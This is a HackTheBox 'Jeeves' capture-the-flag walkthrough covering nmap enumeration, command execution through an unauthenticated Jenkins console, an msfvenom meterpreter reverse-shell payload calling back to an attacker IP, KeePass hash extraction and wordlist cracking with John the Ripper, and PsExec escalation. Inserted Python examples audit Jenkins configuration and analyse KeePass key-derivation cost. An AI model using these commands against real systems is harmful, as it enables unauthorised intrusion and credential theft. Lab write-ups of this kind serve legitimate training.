Jeeves — HackTheBox Walkthrough

There will be no fancy pictures, only the raw meat:

Initial nmap scan (all ports, default scripts, version enumeration):
root@kali:~# nmap -sT --min-rate 5000 --max-retries 1 -p- -sC -sV 10.10.10.63

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-03 17:40 EDT
Nmap scan report for 10.10.10.63
Host is up (0.061s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 19h01m59s, deviation: 0s, median: 19h01m59s
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2018-04-04 12:43:05
|_ start_date: 2018-04-01 22:48:58

It appears that the server is running a Jenkins console on port 50000, so let's create a new Jenkins task to read user.txt:

Jenkins -> New Item -> Freestyle Project -> OK
and configure the build:
Add Build Step button -> Execute Windows batch command ->
type:
dir
pwd
whoami

and finally click on Build Now, then check Console Output:

We can see that the commands are executed as the kohsuke user, so let's try to read the user.txt flag from that account:

http://10.10.10.63:50000/askjeeves/job/test/configure

Click on Build and we get the flag :)
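The whole foothold above rests on one misconfiguration: Jenkins accepting job creation and build steps from an unauthenticated visitor. As an added example (my code, not part of the original walkthrough or of Jenkins itself), the Python snippet below audits a Jenkins config.xml for that state: security switched off, the Unsecured authorization strategy, or a "None" security realm. The two config.xml samples are constructed; the element and class names (useSecurity, hudson.security.AuthorizationStrategy$Unsecured, hudson.security.SecurityRealm$None, FullControlOnceLoggedInAuthorizationStrategy, HudsonPrivateSecurityRealm) are Jenkins' own, and the assumption that a missing denyAnonymousReadAccess or disableSignup means "false" mirrors Jenkins' defaults.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the state that lets an anonymous visitor create a job and
# run an "Execute Windows batch command" build step, as in the walkthrough.
INSECURE_CONFIG = """<hudson>
  <useSecurity>false</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
  <securityRealm class="hudson.security.SecurityRealm$None"/>
</hudson>"""

# Constructed sample of a hardened config.xml: security on, a local user
# database with self-signup off, and anonymous read access denied.
HARDENED_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
</hudson>"""


def audit_jenkins_config(xml_text):
    """Return a list of (code, message) findings for a Jenkins config.xml document."""
    root = ET.fromstring(xml_text)
    findings = []

    # Global switch: anything other than "true" means every request is anonymous.
    if root.findtext("useSecurity", default="").strip().lower() != "true":
        findings.append(("SECURITY_OFF",
                         "useSecurity is not true: all requests are treated as anonymous"))

    # Authorization: who may configure and build jobs once identified.
    strategy = root.find("authorizationStrategy")
    strategy_class = strategy.get("class", "") if strategy is not None else ""
    if not strategy_class or strategy_class.endswith("AuthorizationStrategy$Unsecured"):
        findings.append(("AUTHZ_UNSECURED",
                         "authorization strategy is Unsecured: anyone may configure and build jobs"))
    elif strategy_class.endswith("FullControlOnceLoggedInAuthorizationStrategy"):
        # Assumption: absent element behaves like Jenkins' default of false.
        deny = strategy.findtext("denyAnonymousReadAccess", default="false").strip().lower()
        if deny != "true":
            findings.append(("ANON_READ", "anonymous read access is allowed"))

    # Authentication: which user database, if any, identifies callers.
    realm = root.find("securityRealm")
    realm_class = realm.get("class", "") if realm is not None else ""
    if not realm_class or realm_class.endswith("SecurityRealm$None"):
        findings.append(("REALM_NONE",
                         "security realm is None: no authentication is performed"))
    elif realm_class.endswith("HudsonPrivateSecurityRealm"):
        signup = realm.findtext("disableSignup", default="false").strip().lower()
        if signup != "true":
            findings.append(("SELF_SIGNUP",
                             "self-registration is enabled in the private user database"))

    return findings


def finding_codes(xml_text):
    """Just the finding codes, convenient for scripting and tests."""
    return [code for code, _ in audit_jenkins_config(xml_text)]


if __name__ == "__main__":
    for label, cfg in (("insecure", INSECURE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, finding_codes(cfg) or ["OK"])
```

Point it at $JENKINS_HOME/config.xml on a real controller; the insecure sample reproduces the Jeeves situation and reports SECURITY_OFF, AUTHZ_UNSECURED and REALM_NONE, while the hardened sample reports nothing.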

Now let's generate an msfvenom payload and upload it to the Jeeves machine:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > reverse.exe

On the Metasploit side, you know what to do... and we get a shell!

For the privilege escalation part, I found a KeePassX file under
c:\Users\kohsuke\Documents\CEH.kdbx

Let's extract the KeePass master-key hash from the database with keepass2john:
# keepass2john CEH.kdbx
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
# keepass2john CEH.kdbx > CEH-CrackMe

Crack the KeePassX password with John the Ripper:
# john CEH-CrackMe --wordlist=/usr/share/wordlists/rockyou.txt --fork=4
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
mo(*****) (CEH)
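What keepass2john printed above is not a password hash but the KDBX header material john needs to test a guess: the AES-KDF round count, the offset of the encrypted payload, the master and transform seeds, the CBC IV, the expected start bytes and the first 32 bytes of ciphertext. As an added example (my code, not from the walkthrough or from John the Ripper), the Python below parses that line into named fields and shows why the round count is the knob a database owner controls: every guess costs 2 × rounds AES block operations, so keeping a vault at 6,000 rounds makes a wordlist run an order of magnitude cheaper than at 60,000. The wordlist size and guess rate in the estimate are illustrative assumptions, not measurements.

```python
# The keepass2john line printed in the walkthrough above (KDBX, "version 2" format).
CEH_HASH_LINE = (
    "CEH:$keepass$*2*6000*222*"
    "1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*"
    "3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*"
    "393c97beafd8a820db9142a6a94f03f6*"
    "b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*"
    "cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48"
)

# Expected hex length of each header field (bytes * 2), in the order keepass2john emits them.
FIELD_LENGTHS = {
    "master_seed": 64,           # 32 bytes, hashed together with the transformed key
    "transform_seed": 64,        # 32 bytes, the AES key used by the key transformation
    "encryption_iv": 32,         # 16 bytes, CBC IV for the payload
    "expected_start_bytes": 64,  # 32 bytes that must decrypt correctly if the key is right
    "ciphertext_sample": 64,     # first 32 bytes of the encrypted payload
}


def parse_keepass2john(line):
    """Split a keepass2john KDBX line into named parts. Raises ValueError on malformed input."""
    name, sep, hash_str = line.partition(":")
    if not sep:
        raise ValueError("expected 'name:$keepass$*...'")
    fields = hash_str.split("*")
    if len(fields) != 9 or fields[0] != "$keepass$":
        raise ValueError("not a keepass2john KDBX hash line")
    if fields[1] != "2":
        raise ValueError("only KDBX (version 2) lines are handled here")
    parsed = {
        "name": name,
        "rounds": int(fields[2]),       # AES-KDF transformation rounds
        "data_offset": int(fields[3]),  # byte offset where the encrypted payload starts
    }
    for key, value in zip(FIELD_LENGTHS, fields[4:]):
        if len(value) != FIELD_LENGTHS[key] or any(c not in "0123456789abcdef" for c in value):
            raise ValueError(f"{key}: expected {FIELD_LENGTHS[key]} lowercase hex chars")
        parsed[key] = value
    return parsed


def aes_blocks_per_guess(rounds):
    """AES-KDF encrypts both 16-byte halves of the 32-byte key once per round."""
    return 2 * rounds


def seconds_to_exhaust(wordlist_size, guesses_per_second_at_baseline, rounds, baseline_rounds=6000):
    """Scale a guess rate measured at baseline_rounds to another round count (cost is linear)."""
    rate = guesses_per_second_at_baseline * baseline_rounds / rounds
    return wordlist_size / rate


if __name__ == "__main__":
    info = parse_keepass2john(CEH_HASH_LINE)
    print(f"{info['name']}: {info['rounds']} rounds, payload at offset {info['data_offset']}")
    # Illustrative assumptions: ~14 million candidates and 10,000 guesses/s at 6,000 rounds.
    for rounds in (6000, 60000, 600000):
        print(f"{rounds:>7} rounds -> {aes_blocks_per_guess(rounds):>8} AES blocks/guess, "
              f"wordlist exhausted in {seconds_to_exhaust(14_000_000, 10_000, rounds):,.0f} s")
```

The defender's takeaway is the last three lines of output: the header leaks nothing secret, but a low round count (or, in newer KDBX versions, weak Argon2 parameters) is what turns a leaked .kdbx into a short rockyou run.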

Open the KeePassX file with the cracked password.

Use PsExec with Metasploit:

Get root.txt